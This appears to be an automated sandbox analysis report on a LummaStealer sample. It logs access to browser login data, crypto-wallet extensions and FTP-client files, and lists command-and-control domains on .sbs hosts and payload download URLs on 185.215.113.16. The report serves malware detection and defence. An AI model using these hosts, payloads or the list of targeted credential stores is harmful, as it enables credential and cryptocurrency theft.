              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FAAGWHBVUUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1399975749.0000000001180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1385490600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1384589859.0000000001180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1399651193.000000000117F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1399139750.000000000117F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7724, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7724, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              12
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              751
              Security Software Discovery
              Remote Services41
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Process Injection
              LSASS Memory34
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets223
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559252 Sample: file.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 28 shed.dual-low.s-part-0032.t-0009.t-msedge.net 2->28 30 s-part-0032.t-0009.t-msedge.net 2->30 32 3 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Antivirus detection for URL or domain 2->46 48 7 other signatures 2->48 8 file.exe 12 2->8         started        signatures3 process4 dnsIp5 34 185.215.113.16, 49812, 80 WHOLESALECONNECTIONSNL Portugal 8->34 36 cook-rain.sbs 188.114.96.3, 443, 49719, 49725 CLOUDFLARENETUS European Union 8->36 50 Detected unpacking (changes PE section rights) 8->50 52 Query firmware table information (likely to detect VMs) 8->52 54 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->54 56 10 other signatures 8->56 12 chrome.exe 1 8->12         started        15 chrome.exe 8->15         started        signatures6 process7 dnsIp8 38 192.168.2.7, 123, 138, 443 unknown unknown 12->38 40 239.255.255.250 unknown Reserved 12->40 17 chrome.exe 12->17         started        20 chrome.exe 15->20         started        process9 dnsIp10 22 s-part-0016.t-0009.t-msedge.net 13.107.246.44, 443, 49917 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->22 24 s-part-0017.t-0009.t-msedge.net 13.107.246.45, 443, 49703, 49704 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->24 26 9 other IPs or domains 17->26

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Trojan.LummaStealer
              file.exe100%AviraTR/Crypt.ZPACK.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://cook-rain.sbs/&MU100%Avira URL Cloudmalware
              https://cook-rain.sbs/lOr100%Avira URL Cloudmalware
              https://cook-rain.sbs/apiT100%Avira URL Cloudmalware
              https://cook-rain.sbs/apiQ100%Avira URL Cloudmalware
              https://cook-rain.sbs/tLj100%Avira URL Cloudmalware
              https://cook-rain.sbs/apivalue100%Avira URL Cloudmalware
              https://cook-rain.sbs/apiK100%Avira URL Cloudmalware
              https://cook-rain.sbs/apir100%Avira URL Cloudmalware
              https://cook-rain.sbs/q100%Avira URL Cloudmalware
              https://cook-rain.sbs/api22I100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0016.t-0009.t-msedge.net
              13.107.246.44
              truefalse
                high
                cook-rain.sbs
                188.114.96.3
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    www.google.com
                    142.250.185.228
                    truefalse
                      high
                      s-part-0032.t-0009.t-msedge.net
                      13.107.246.60
                      truefalse
                        high
                        js.monitor.azure.com
                        unknown
                        unknownfalse
                          high
                          mdec.nelreports.net
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            peepburry828.sbsfalse
                              high
                              p10tgrace.sbsfalse
                                high
                                processhol.sbsfalse
                                  high
                                  https://cook-rain.sbs/apifalse
                                    high
                                    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                      high
                                      p3ar11fter.sbsfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_118.6.drfalse
                                          high
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_118.6.drfalse
                                                  high
                                                  https://www.linkedin.com/cws/share?url=$chromecache_99.6.dr, chromecache_110.6.drfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/Youssef1313chromecache_118.6.drfalse
                                                        high
                                                        https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_99.6.dr, chromecache_110.6.drfalse
                                                          high
                                                          https://aka.ms/msignite_docs_bannerchromecache_99.6.dr, chromecache_110.6.drfalse
                                                            high
                                                            https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_110.6.drfalse
                                                              high
                                                              http://polymer.github.io/AUTHORS.txtchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                high
                                                                https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_118.6.drfalse
                                                                  high
                                                                  https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_99.6.dr, chromecache_110.6.drfalse
                                                                    high
                                                                    https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_118.6.drfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://aka.ms/pshelpmechoosechromecache_99.6.dr, chromecache_110.6.drfalse
                                                                            high
                                                                            https://aka.ms/feedback/report?space=61chromecache_118.6.drfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://learn-video.azurefd.net/vod/playerchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                  high
                                                                                  https://twitter.com/intent/tweet?original_referer=$chromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                    high
                                                                                    https://github.com/gewarrenchromecache_118.6.drfalse
                                                                                      high
                                                                                      http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.1672013644.000000000079A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://polymer.github.io/CONTRIBUTORS.txtchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                            high
                                                                                            https://cook-rain.sbs/apivaluefile.exe, 00000000.00000003.1399975749.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399651193.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399139750.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1400061483.0000000001194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://cook-rain.sbs/&MUfile.exe, 00000000.00000002.1673887495.0000000001116000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://cook-rain.sbs/tLjfile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_118.6.drfalse
                                                                                              high
                                                                                              https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_118.6.drfalse
                                                                                                high
                                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                  high
                                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                    high
                                                                                                    https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                      high
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/Thrakachromecache_118.6.drfalse
                                                                                                          high
                                                                                                          https://cook-rain.sbs/apirfile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://polymer.github.io/PATENTS.txtchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                            high
                                                                                                            https://aka.ms/certhelpchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                              high
                                                                                                              http://185.215.113.16/steam/random.exefile.exe, 00000000.00000003.1549958020.000000000116A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1674087974.0000000001173000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1650012944.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cook-rain.sbs/file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/mairawchromecache_118.6.drfalse
                                                                                                                          high
                                                                                                                          http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://schema.orgchromecache_110.6.drfalse
                                                                                                                              high
                                                                                                                              http://polymer.github.io/LICENSE.txtchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                                                high
                                                                                                                                https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1418061328.00000000059E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://aka.ms/yourcaliforniaprivacychoiceschromecache_118.6.drfalse
                                                                                                                                      high
                                                                                                                                      https://cook-rain.sbs/qfile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1416543771.0000000001195000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1451659553.000000000119F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442655717.000000000119E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433824466.0000000001196000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442496677.000000000119C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446838460.000000000119F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      unknown
                                                                                                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/nschonnichromecache_118.6.drfalse
                                                                                                                                          high
                                                                                                                                          https://cook-rain.sbs/apiTfile.exe, 00000000.00000003.1451659553.000000000119F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446838460.000000000119F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          https://cook-rain.sbs/lOrfile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1416543771.0000000001195000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433824466.0000000001196000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399975749.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399651193.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1399139750.000000000117F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1400061483.0000000001194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/adegeochromecache_118.6.drfalse
                                                                                                                                              high
                                                                                                                                              https://cook-rain.sbs:443/apifile.exe, 00000000.00000003.1416484757.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cook-rain.sbs/api22Ifile.exe, 00000000.00000002.1673887495.0000000001116000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://cook-rain.sbs/apiKfile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433824466.0000000001196000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433901033.000000000119E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://cook-rain.sbs/apiQfile.exe, 00000000.00000003.1416543771.0000000001195000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://github.com/jonschlinkert/is-plain-objectchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1417016014.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://octokit.github.io/rest.js/#throttlingchromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://github.com/js-cookie/js-cookiechromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.1650012944.0000000001172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schema.org/Organizationchromecache_118.6.drfalse
                                                                                                                                                                    high
